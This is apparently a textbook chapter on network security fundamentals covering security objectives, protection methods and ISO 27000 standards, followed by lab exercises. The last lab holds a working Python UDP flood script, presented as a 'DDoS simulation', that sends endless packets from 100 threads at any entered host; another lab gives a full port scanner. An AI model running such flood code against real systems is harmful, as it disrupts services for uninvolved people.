Chapter 1

Computer Network Security Fundamentals

1.1 Introduction
Cybersecurity is the protection of information that is stored, transmitted, and pro-
cessed in a networked system of computers, other digital devices, and network
devices and transmission lines, including the Internet. Protection encompasses
confidentiality, integrity, availability, authenticity, and accountability. Methods of
protection include organizational policies and procedures, as well as technical means
such as encryption and secure communications protocols.

As subsets of cybersecurity, we can define the following:

■ Information security: This term refers to preservation of confidentiality,

integrity, and availability of information. In addition, other properties, such as
authenticity, accountability, nonrepudiation, and reliability can also be involved.
■ Network security: This term refers to protection of networks and their service
from unauthorized modification, destruction, or disclosure, and provision of
assurance that the network performs its critical functions correctly and there are no
harmful side effects.

Security Objectives
The cybersecurity definition introduces three key objectives that are at the heart of
information and network security:
■ Confidentiality: This term covers two related concepts:
— Data confidentiality: Assures that private or confidential information is not made
available or disclosed to unauthorized individuals.
— Privacy: Assures that individuals control or influence what information related
to them may be collected and stored and by whom and to whom that information
may be disclosed.
■ Integrity: This term covers two related concepts:
— Data integrity: Assures that data (both stored and in transmitted packets) and
programs are changed only in a specified and authorized manner. This concept also
encompasses data authenticity, which means that a digital object is indeed what it
claims to be or what it is claimed to be, and nonrepudiation, which is assurance that
the sender of information is provided with proof of delivery and the recipient is
provided with proof of the sender’s identity, so neither can later deny having
processed the information.
— System integrity: Assures that a system performs its intended function in an
unimpaired manner, free from deliberate or inadvertent unauthorized manipulation
of the system.
■ Availability: Assures that systems work promptly and service is not denied to
authorized users.

1.3 Forms of Protection

Some protection methods are used to reduce security issues.
Authentication :
Authentication is the process of recognizing or identifying a user’s identity whether
it is true, real, or not. It’s simply a verification of whether you are who you say you
are or not. There are many authentication methods available nowadays like password
authentication that includes using a password, physical authentication that includes
the scannable card or smart card or digital certificate, biometric authentication that
includes signatures and fingerprints, or visual identification, and many more.

Authorization :
Authorization means to ensure whether you have permission to access on the
network or not. It’s simply a verification of whether the user has access or not. Some
authorization methods are ACLs (Access Control Lists), Secure objects and
methods, Access control for URLs, etc.

Biometric System :
A Biometric system is one of the most secure systems as it provides high security to
the computer network. This system verifies the user’s identity based on some
important characteristics that are physiological and behavioral features.
Physiological features include face, eyes, fingerprints, and hands. Behavioral
features include voice, signature, etc.

Firewall :
A firewall is a method of network security that prevents the computer network from
users that are not authorized to have access to a network. Firewalls can either be
hardware or software or both. It acts as a barrier between unauthorized Internet users
and private computer networks connected to the Internet. It blocks the message,
viruses, hackers if they do not have authorized access and do not meet the security
criteria as per requirement. Any message entering or leaving private computer
networks connected to the Internet, especially Intranet, passes through the firewall.
Firewall then checks each message and blocks if found unauthorized.

1.4 Security Standards

To make cybersecurity measures explicit, the written norms are required. These
norms are known as cybersecurity standards: the generic sets of prescriptions for an
ideal execution of certain measures. The standards may involve methods, guidelines,
reference frameworks, etc. It ensures efficiency of security, facilitates integration
and interoperability, enables meaningful comparison of measures, reduces
complexity, and provide the structure for new developments.

A security standard is "a published specification that establishes a common

language, and contains a technical specification or other precise criteria and is
designed to be used consistently, as a rule, a guideline, or a definition." The goal of
security standards is to improve the security of information technology (IT) systems,
networks, and critical infrastructures. The Well-Written cybersecurity standards
enable consistency among product developers and serve as a reliable standard for
purchasing security products.

Security standards are generally provided for all organizations regardless of their
size or the industry and sector in which they operate. This section includes
information about each standard that is usually recognized as an essential component
of any cybersecurity strategy.

1. ISO
ISO stands for International Organization for Standardization. International
Standards make things work. These standards provide a world-class specification for
products, services and computers, to ensure quality, safety and efficiency. They are
instrumental in facilitating international trade.

ISO standard was officially established On 23 February 1947. It is an independent,

non-governmental international organization. Today, it has a membership of 162
national standards bodies and 784 technical committees and subcommittees to take
care of standards development. ISO has published over 22336 International
Standards and its related documents which covers almost every industry, from
information technology, to food safety, to agriculture and healthcare.

ISO 27000 Series

It is the family of information security standards which is developed by the
International Organization for Standardization and the International Electrotechnical
Commission to provide a globally recognized framework for best information
security management. It helps the organization to keep their information assets
secure such as employee details, financial information, and intellectual property.

The need of ISO 27000 series arises because of the risk of cyber-attacks which the
organization face. The cyber-attacks are growing day by day making hackers a
constant threat to any industry that uses technology.

The ISO 27000 series can be categorized into many types. They are-

ISO 27001- This standard allows us to prove the clients and stakeholders of any
organization to managing the best security of their confidential data and information.
This standard involves a process-based approach for establishing, implementing,
operating, monitoring, maintaining, and improving our ISMS.

ISO 27000- This standard provides an explanation of terminologies used in ISO

27001.

ISO 27002- This standard provides guidelines for organizational information

security standards and information security management practices. It includes the
selection, implementation, operating and management of controls taking into
consideration the organization's information security risk environment(s).

ISO 27005- This standard supports the general concepts specified in 27001. It is
designed to provide the guidelines for implementation of information security based
on a risk management approach. To completely understand the ISO/IEC 27005, the
knowledge of the concepts, models, processes, and terminologies described in
ISO/IEC 27001 and ISO/IEC 27002 is required. This standard is capable for all kind
of organizations such as non-government organization, government agencies, and
commercial enterprises.

ISO 27032- It is the international Standard which focuses explicitly on

cybersecurity. This Standard includes guidelines for protecting the information
beyond the borders of an organization such as in collaborations, partnerships or other
information sharing arrangements with clients and suppliers.

Write short notes on cyber security policy of Nepal.

Write short notes on different types of cyber attacks.

Lab Works:
1. Write a python script to scan all the available ports for a given host.
import socket
from datetime import datetime

try:
host_name = input("Enter the host url: ")
target = socket.gethostbyname(host_name)
for i in range(1, 65535):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
result = s.connect_ex((target, i))
if result == 0:
print(f'connected to port: {i}')
else:
print(f'unable to connect to port: {i}')
s.close()
except Exception as e:
print(e)

2. Write a python script to simulate a DDoS attack.

import socket
import threading
import random

try:
host_name = input("Enter the host url: ")
target = socket.gethostbyname(host_name)
except Exception as e:
print(e)

i = 0

def attack():
global i
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(b'hello..................', (target, 21))
print(f'packet sent: {i}')
i = i+1

for i in range(100):
t1 = threading.Thread(target=attack)
t1.start()